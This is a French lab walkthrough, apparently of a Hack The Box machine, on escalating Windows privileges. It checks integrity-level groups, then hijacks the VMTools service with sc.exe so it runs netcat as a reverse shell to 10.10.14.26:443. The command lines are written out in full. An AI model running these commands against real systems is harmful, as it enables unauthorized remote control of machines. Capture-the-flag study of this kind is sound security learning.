Integrity Levels (whoami /group) Windows Privilege Escalation

Les Integrity Levels dans Windows définissent le niveau de confiance des objets (processus, fichiers) et contrôlent leurs interactions. Ils incluent Low, Medium, High, et System, empêchant un objet de niveau inférieur de modifier ou interagir avec un niveau supérieur, renforçant ainsi la sécurité.

Vérification des Groupes d’Appartenance La commande whoami /groups indique que l’utilisateur appartient au groupe Mandatory Label\High Mandatory Level, ce qui lui permet de gérer les services.

Manipulation de Services pour l'Élévation de Privilèges L'utilisateur peut potentiellement modifier un service et le redémarrer pour exécuter une commande avec des privilèges plus élevés.

Tentative de Création d'un Service Une tentative de création d’un service de reverse shell est effectuée avec sc.exe, mais sans les droits nécessaires :

sc.exe create reverse binPath="C:\Users\svc-printer\Desktop\nc.exe -e cmd 10.10.14.26 443"

Modification du Service VMTools Pour exploiter un service existant, nc.exe est transféré sur la machine cible, puis le service VMTools est modifié pour exécuter un reverse shell :

Transfert de Netcat

cp /home/jordan/Desktop/htb/artic/scripts/netcat/nc.exe .

upload /home/jordan/Desktop/htb/return/content/nc.exe

L'idée ici est de rediriger l'exécutable d'un service pour qu'il exécute une commande de reverse shell, te donnant ainsi potentiellement une session avec des privilèges élevés si le service s'exécute avec des privilèges SYSTEM.

sc.exe config VMTools binPath="C:\Users\svc-printer\Desktop\nc.exe -e cmd 10.10.14.26 443"

Redémarrage du Service Après configuration, le service est redémarré pour lancer le shell :

sc.exe stop VMTools
sc.exe start VMTools

Mise en écoute sur le port 443 pour capter la connexion entrante :

sudo rlwrap nc -nlvp 443

Mis à jour il y a 11 mois

Ce contenu vous a-t-il été utile ?